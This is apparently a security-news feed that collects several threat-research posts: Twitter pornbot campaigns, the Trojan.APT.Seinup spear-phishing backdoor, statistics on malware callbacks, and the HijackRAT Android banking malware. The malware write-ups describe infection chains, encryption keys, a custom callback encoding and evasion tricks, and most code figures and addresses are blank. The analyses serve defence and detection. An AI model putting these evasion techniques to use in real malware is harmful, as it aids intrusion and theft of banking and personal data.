• Systematic coordination: Related sets of pornbots systematically coordinated their tweets. One pornbot would post a tweet containing a hashtag, and other pornbots within its group would subsequently post tweets containing the same hashtag, followed by random and unrelated terms. 

• Many tweets, but few followers: Each of the observed pornbots posted tweets at a rapid cadence, with some posting more than 50 times per day. Most of the observed pornbot accounts boasted more than 10,000 tweets, but typically had fewer than 200 followers. Similarly, most of the pornbots were following fewer than 200 other users. 

Image 6: Example of a reverse Google Images search revealing use of a single profile image across multiple pornbot accounts.

Image 6: Example of a reverse Google Images search revealing use of a single profile image across multiple pornbot accounts.

Image 7: Example of systemically coordinated tweeting among pornbots.

Image 7: Example of systemically coordinated tweeting among pornbots.

Pornbot Mitigation Best Practices

The following mitigation measures may help reduce the number of pornbots and spambots using brand names. These steps may also reduce the number of false detections and aid in validating social media metrics:

• Challenge social media teams to identify and block pornbots and spambots following company social media accounts. This action impacts the bots’ ability to capture and retweet relevant and branded tweets.

• Require social media teams to report these accounts through Twitter’s abuse function.

• Implement response actions to react to large campaigns, such as social media teams and cyber threat teams notifying each other when activity is detected.

The post Inside a Twitter ‘Pornbot’ Campaign appeared first on Flashpoint.

Go to Source
Author: Flashpoint

Trojan.APT.Seinup Hitting ASEAN

1. Executive Summary

The FireEye research team has recently identified a number of spear
phishing activities targeting Asia and ASEAN. Of these, one of the
spear phishing documents was suspected to have used a potentially
stolen document as a decoy. The rich and contextual details (body and
metadata) which are not available online lead us to believe this was
stolen. This decoy document mentioned countries such as Brunei,
Cambodia, Indonesia, Laos, Malaysia, Myanmar, Philippines, Singapore,
Thailand, and Vietnam, which leads us to suspect that these countries
are targeted. As the content of this decoy document is suspected to be
a stolen sensitive document, the details will not be published.

This malware was found to have used a number of advance techniques
which makes it interesting:

  1. The malware leverages Google Docs to perform redirection to
    evade callback detection. This technique was also found in the
    malware dubbed “Backdoor.Makadocs” reported by Takashi
    Katsuki (Katsuki, 2012).
  2. It is heavily equipped with a
    variety of cryptographic functions to perform some of its functions
  3. The malicious DLL is manually loaded into memory
    which hides from DLL listing.

As depicted in the diagram below, the spear phishing document (which
exploits CVE-2012-0158) creates a decoy document and a malware dropper
named exp1ore.exe. This dropper will then drop wab.exe (Address Book
Application) and wab32res.dll (malicious DLL) inside the temp folder.
By running wab.exe, the malicious DLL named wab32res.dll (located
within the same folder) will be loaded using DLL side-loading
technique. This will in turn install a copy of wab32res.dll as
msnetrsvw.exe inside the windows directory to be registered as Windows
service. By registering as a Windows service, it allows the malware to
survive every reboot and persist on the network.


Figure 1 Infection Flow

This malware is named “Trojan.APT.Seinup” because one of its export
functions is named “seinup”. This malware was analysed to be a
backdoor that allows the attacker to remote control the infected system.


Figure 2 Exported Functions

2. Related APT Domain and MD5

Based on our threat intelligence and reverse-engineering effort,
below are some related domain and MD5 sums. Please note that some of
the domain/IP association may change.

2.1. Related Domain

Domain/URL IP Country Comments

Registrar: XIN NET

Registrar: XIN NET

Registrar: XIN NET


Registrar: SHANGHAI







2.2. Associated Files

Name MD5 Comments

Spear-phishing document and decoy
Spear-phishing document and
decoy document






Benign Address Book Application
Benign Address Book



Malware to be side loaded when wab.exe is
Malware to be side loaded
when wab.exe is launched.



Malware to be installed as a service. Note: This is
the same as wab32res.dll.
Malware to be installed as
a service. Note: This is the same as wab32res.dll.


Calls to
Calls to


Calls to

Calls to


Calls to
Calls to


Calls to
Calls to


Calls to
Calls to


Calls to

Calls to

3. Interesting Technical Observations

3.1. Redirection Using Google Docs

By connecting the malicious server via Google Docs, the malicious
communication is protected by the legitimate SSL provided by Google
Docs (see Figure below). One possible way to examine the SSL traffic
is to make use of a hardware SSL decrypter within an organisation.
Alternatively, you may want to examine the usage pattern of the users.
Suppose a particular user accesses Google Docs multiple times a day,
the organization’s Incident Response team may want to dig deeper to
find out if the traffic is triggered by a human or by malware.

Retrieve Command

Figure 3 Retrieve Command via Google Docs

Below is the code that is used to construct a URL that retrieves
command via Google Docs. First, the malicious URL is constructed and
then encoded. Next, the malware simply leverages the Google Docs
viewer to retrieve the command from the malicious server (see Figure
below). 4.GoogleDocs

Figure 4 View Command via GoogleDocs

3.2. Zero-Skipping XOR Encryption

The shellcode encryption technique is fairly standard. The shellcode
has a decryption stub which decrypts its body using the XOR key 0x9E,
and this shellcode is used to extract exp1ore.exe(malware) and Wor.doc
(benign document).

The exp1ore.exe and Wor.doc were found within the spear phishing
document encrypted using the same key (0xFC) and technique. The XOR
key decrypts only a non-zero byte (see Figure 5). This prevents
statistical methods of recovering the XOR key. The encrypted
executable file and benign document were identified to be located
inside the spear phishing document at offsets 0x2509 and 0x43509 respectively.


Figure 5 Zero Skipping XOR Encryption

Even though statistical methods may not be useful in identifying the
XOR key as the zero bytes are not encrypted, we could use some of the
“known” strings below to hunt for the XOR key in this situation. By
sliding the known string across the array of bytes to perform a
windowed XOR, the key would be revealed when the encoded data is XORed
with the known string.

  • “This program cannot be run in DOS mode”
  • “KERNEL32.dll”
  • “LoadLibraryA”

3.3. Deployment of Various Cryptographic Functions

3.3.1. Secure Callback

The malware performs the callback in a secure manner. It uses a
custom Base64 map to encode its data, and creates a salted digital
thumbprint to allow validation of data.

Below describes the steps to validate a callback using an example of
the following URL:









The URL could be generalised as follows:


The definition of A’, B’, C’ and D’ are as follows:

Let H be the function which encodes binary into hexadecimal
characters prepend with “%”, if it is not alphanumeric, dash,
underscore or dot

Let B64 be the base 64 encoder using the following custom map, “URPBnCF1GuJwH2vbkLN6OQ/5S9TVxXKZaMc8defgiWjmo7pqrAstyz0D+El3I4hY”.

Let PT be the plain text which is in the form of
where HostName and IPAddress are string, and RunType is a character.

Let A be the random of 3 to 7 characters, and A’ = H(A)

Let B be B64 (PT), and B’ = H(B)

Let C be 32 char deliminator, and C’ = H(C)

Let D be H( MD5 ( salt  + MD5 ( B64(PT) + A + C )  )   ), salt =
“%^^*HFH)*$FJK)234sd2N@C(JGl2z94cg23”  , and D’ = H(D)

Hence, in this case, the specific malicious URL could be applied as follows:

Domain/  =

A’ = “5Pb

B’ = “6QeZky42OCQOLQuZ6dC2LQ7F56iAv6GpH6S%2Bw8npH5oAZk==

C’ = “cc3237bc79192a096440faca0fdae107

D’ = “


(This is the digital signature)

The hash could be verified as follow:

B64(PT) + A + C =
“6QeZky42OCQOLQuZ6dC2LQ7F56iAv6GpH6S+w8npH5oAZk==” +  “5Pb” + “cc3237bc79192a096440faca0fdae107”

MD5 (B64(PT) + A + C) = “766cf9e96c1a508c59f7ade1c50ecd28”

MD5 (salt + MD5(B64(PT) + A + C))   = MD5 (
“%^^*HFH)*$FJK)234sd2N@C(JGl2z94cg23” + “766cf9e96c1a508c59f7ade1c50ecd28”)

= 349118df672db38f9e65659874b60b27
(This equals to D’, which means verified)

The encoded plain text (B) could be recovered:

B64(PT) = “6QeZky42OCQOLQuZ6dC2LQ7F56iAv6GpH6S+w8npH5oAZk==”;

is the hostname, ‘F’ is the run type, “” is the IP address.

Note: This example is mocked up using a dummy computer name and IP address.

The python code below could be used to decode the custom encoded
string (see Figure below).


Figure 6 Python to Decode a Custom Base 64

3.3.2. Random Generator Using Mersenne Twister Algorithm

The malware was found to perform a callback at random intervals so
as to evade network investigation when looking for network connections
that are performed in a regular interval. Additionally, even the name
of the parameters in the get string have a random length and name,
which makes it hard to create a fix signature to detect such callbacks
(see ‎3.3.1 to understand how a callback is created).


Figure 7 Mersenne Twister Algorithm Seeding function

 3.4. In-Memory Only Malicious Code

On the disk, the malicious code is either encrypted or compressed to
evade scanning using signature rules. Only upon being loaded into
memory, does the malicious code (that appears to be in the form of a
DLL) get manually loaded without the use of Windows 32 API. In this
way, when an investigation is performed, the malicious DLL is not
revealed. Additionally, it makes it much harder for analysis to be performed.


Figure 8 Segments in the memory which contains the malicious code

Taking a deeper look at the decrypted malicious code, this malware
was found to contain at least the following functions:

  • Download file
  • Download and execute or load
  • Change sleep duration
  • Open and close
    interactive sessions

4. Conclusion

Malware is increasingly becoming more contextually advanced. It
attempts to appear as much as possible like legitimate software or
documents. In this example, we would conclude the following.

  1. A potentially stolen document was used as a decoy document to
    increase its credibility. It is also a sign that the compromised
    organisations could be used as a soft target to compromise their
    business partners and allies.
  2. It is important to put a stop
    to the malware infection at the very beginning, which is the
    exploitation phase. Once a network is compromised, it is
    increasingly harder to detect such threats.
  3. Anti-incident
    response/forensic techniques are increasingly used to evade
    detection. It would require a keen eye on details and a wealth of
    experience to identify all these advance techniques.

5. Works Cited

Carnegie Mellon University. (n.d.). Retrieved from

Katsuki, T. (19 Nov, 2012). Malware Targeting Windows 8 Uses
Google Docs.
Retrieved from

I would like to thank several colleagues for their significant
contributions on this post: Darien Kindlund, Ned Moran, Nart
Villeneuve, and Thoufique Haq.

Go to Source
Author: Chong Rong Hwa

Malware Callbacks

Today we released our first-ever analysis of malware callbacks. Our
report can be accessed here:

FireEye monitored more than 12 million malware communications seeking
instructions—or callbacks—across hundreds of thousands of infected
enterprise hosts, capturing details of advanced attacks as well as
more generic varieties during the course of 2012. Callback activity
reveals a great deal about an attacker’s intentions, interests and
geographic location. Cyber attacks are a widespread global activity.
We’ve built interactive maps that highlight the presence of malware

Our key findings:

  • Malware has become a multinational activity. Over the past
    year, callbacks were sent to command and control (CnC) servers in 184
    countries—a 42 percent increase when compared to 130 countries in 2010.
  • Two key regions stand out as hotspots driving advanced cyber
    attacks: Asia and Eastern Europe.
    Looking at the average
    callbacks per company by country, the Asian nations of China, South
    Korea, India, Japan, and Hong Kong accounted for 24 percent. Not far
    behind, the Eastern European countries of Russia, Poland, Romania,
    Ukraine, Kazhakstan, and Latvia comprised 22 percent. (North America
    represented 44 percent but this is due to CnC servers residing in the
    United States to help attackers with evasion.)
  • The majority of Advanced Persistent Threat (APT) callback
    activities are associated with APT tools that are made in China or
    that originated from Chinese hacker groups
    . By mapping the DNA
    of known APT malware families against callbacks, FireEye Malware
    Intelligence Lab discovered that the majority of APT callback
    activities—89 percent—are associated with APT tools that are made in
    China or that originated from Chinese hacker groups. The main tool is
    Gh0st RAT.
  • Attackers are increasingly sending initial callbacks to servers
    within the same nation in which the target resides
    . To improve
    evasion, hackers are increasingly placing CnC servers within target
    nations. At the same time, this fact gives a strong indicator of which
    countries are most interesting to attackers.
  • Technology organizations are experiencing the highest rate of APT
    callback activity
    . With a high volume of intellectual property,
    technology firms are natural targets for attackers and are
    experiencing heavy APT malware activity.
  • For APT attacks, CnC servers were hosted in the United States 66
    percent of the time, a strong indicator that the U.S. is still the
    top target country for attacks
    . As previously mentioned,
    attackers increasingly put CnC servers in the target country to help
    avoid detection. With such a high proportion of CnC servers, by a wide
    margin, the U.S. is subject to the highest rate of malware attacks.
    This is likely, due to a very high concentration of intellectual
    property and digitized data that resides in the U.S.
  • Techniques for disguising callback communications are evolving.
    To evade detection, CnC servers are leveraging social networking sites
    like Facebook and Twitter for communicating with infected machines.
    Also, to mask exfiltrated content, attackers embed information inside
    common files, such as JPGs, to give network scanning tools the
    impression of normal traffic.
  • Attack patterns vary substantially globally:
  • South Korean firms experience the highest level of callback
    communications per organization
    . Due to a robust internet
    infrastructure, South Korea has emerged as a fertile location for
    cybercriminals to host their CnC infrastructure. For example, FireEye
    found that callbacks from technology firms are most likely to go to
    South Korea.
  • In Japan, 87 percent of callbacks originated and stayed in
    . This may give an indication of the high value of Japanese
    intellectual property.
  • In Canada, 99 percent of callbacks exited the country. In the U.K.,
    exit rates were 90 percent
    . High exit rates indicate attackers
    are unconcerned about detection. In Canada and the U.K., attackers
    appear to be unconcerned about detection and pursue low-hanging fruit opportunistically.

Go to Source
Author: Rob Rachwald

The Service You Can’t Refuse: A Secluded HijackRAT

In Android world, sometimes you can’t stop malware from “serving”
you, especially when the “service” is actually a malicious Android
class running in the background and controlled by a remote access tool
(RAT). Recently, FireEye mobile security researchers have discovered
such a malware that pretends to be a “Google Service Framework” and
kills an anti-virus application as well as takes other malicious actions.

In the past, we’ve seen Android malware that execute privacy leakage,
banking credential theft, or remote access separately, but this sample
takes Android malware to a new level by combining all of those
activities into one app. In addition, we found the hacker has designed
a framework to conduct bank hijacking and is actively developing
towards this goal. We suspect in the near future there will be a batch
of bank hijacking malware once the framework is completed. Right now,
eight Korean banks are recognized by the attacker, yet the hacker can
quickly expand to new banks with just 30 minutes of work.

Although the IP addresses we have captured don’t reveal who the
attacker is, as the computer of the IP might be a victim as well, we
have found from the UI that both the malware developer and the victims
are Korean speakers.

Fig. 1. The structure of the HijackRAT malware.
Fig. 1. The structure of the HijackRAT malware.

The package name of this new RAT malware is “com.ll” and appears as
“Google Service Framework” with the default Android icon. Android
users can’t remove the app unless they deactivate its administrative
privileges in “Settings.” So far, the Virus Total score of the sample
is only five positive detections out of 54 AV vendors [1]. Such new
malware is published quickly partly because the CNC server, which the
hacker uses, changes so rapidly.

Fig. 2. The Virus Total detection of the malware
sample. [1]
Fig. 3. The fake “Google Service Framework” icon
in home screen.

A few seconds after the malicious app is installed, the “Google
Services” icon appears on the home screen. When the icon is clicked,
the app asks for administrative privilege. Once activated, the
uninstallation option is disabled and a new service named “GS” is
started as shown below. The icon will show “App isn’t
installed.” when the user tries to click it again and removes
itself from the home screen.

Fig. 4. The background service of the malware.
Fig. 4. The background service of the malware.

The malware has plenty of malicious actions, which the RAT can
command, as shown below.


Within a few minutes, the app connects with the CNC server and begins
to receive a task list from it:


The content is encoded by Base64 RFC 2045. It is a JSONObject with
content: {“task”: {“0”: 0}}, when decoded. The
server IP,, is located in Hong Kong. We cannot tell if
it’s the hacker’s IP or a victim IP controlled by the RAT, but the URL
is named after the device ID and the UUID generated by the CNC server.

The code below shows how the URL of the HTTP GET request is constructed:



The task list shown above will trigger the first malicious action of
“Upload Phone Detail.” When executed, the user’s private information
will be uploaded to the server using HTTP POST request. The
information contains phone number, device ID, and contact lists as
shown below in the network packet of the request:


When decoded, the content in the red and blue part of the PCap are
shown below respectively:

1. The red part:


2. The blue part:


The contact list shown above is already highly sensitive, yet,
if the user has installed some banking applications, the malware
will scan for them too.

In a testing device, we installed the eight Korean bank apps as
shown below:

Fig. 5. The eight banking apps.
Fig. 5. The eight banking apps.

When this was done,  we found the value of
“banklist” in the PCap is no longer listed as N/A anymore:


The “banklist” entry in the PCap is filled with the short names
of the banks that we installed. There is a map of the short names
and package names of the eight banking apps installed on the phone:


The map of the banks is stored in a database and used in another
malicious action controlled by the CNC server too.


In this malicious action, the CNC server sends a command to
replace the existing bank apps. The eight banking apps require the
installation of “com.ahnlab.v3mobileplus,” which is a popular
anti-virus application available on Google Play. In order evade any
detections, the malware kills the anti-virus application before
manipulating the bank apps. In the code as shown below, Conf.LV is
the “com.ahnlab.v3mobileplus” being killed.


Then, the malware app parses the banking apps that the user has
installed on the Android device and stores them in the database
under /data/data/com.ll/database/simple_pref. The red block below
shows the bank list stored in the database:


Once the corresponding command is sent from the RAT, the
resolvePopWindow() method will be called and the device will pop a
Window with the message: “The new version has been released. Please
use after reinstallation.”


The malware will then try to download an app, named after
“update” and the bank’s short name from the CNC server,
simultaneously uninstalling the real, original bank app.


In the code shown above, “mpath” contains the CNC server IP
( and path (determined by the RAT); “mbkname” is the
bank name retrieved from the SQL lite database. The fake APK (e.g.
“updateBH.apk”) is downloaded from the CNC server, however
we don’t know what the fake apps look like because during the research
the command for this malicious action was not executed from the RAT.
Yet the source of the “update*.apk” is definitely not certified by the
banks and might be harmful to the Android user.


When the command to “update” is sent from the RAT, a similar app –
“update.apk” is downloaded from the CNC server and installed in the
Android phone:



When the command to upload SMS is received from the RAT, the SMS of
the Android phone will be uploaded to the CNC server. The SMS has been
stored in the database once received:



Then the SMS is read from the database and uploaded to the CNC server
once the command is received:



Similarly, when the sending SMS command is received, the contact list
is sent through SMS.



Interesting enough, we found a partially finished method called “Bank
Hijack.” The code below partially shows how the BankHijack method
works. The malware reads the short bank name, e.g. “NH”, and then
keeps installing the updateNH.apk from the CNC server until it’s of
the newest version.


So far the part after the installation of the fake app is not
finished yet. We believe the hacker is having some problems finishing
the function temporarily.


As shown above, the hacker has designed and prepared for the
framework of a more malicious command from the CNC server once the
hijack methods are finished. Given the unique nature of how this app
works, including its ability to pull down multiple levels of personal
information and impersonate banking apps, a more robust mobile banking
threat could be on the horizon.




Go to Source
Author: Jinjian Zhai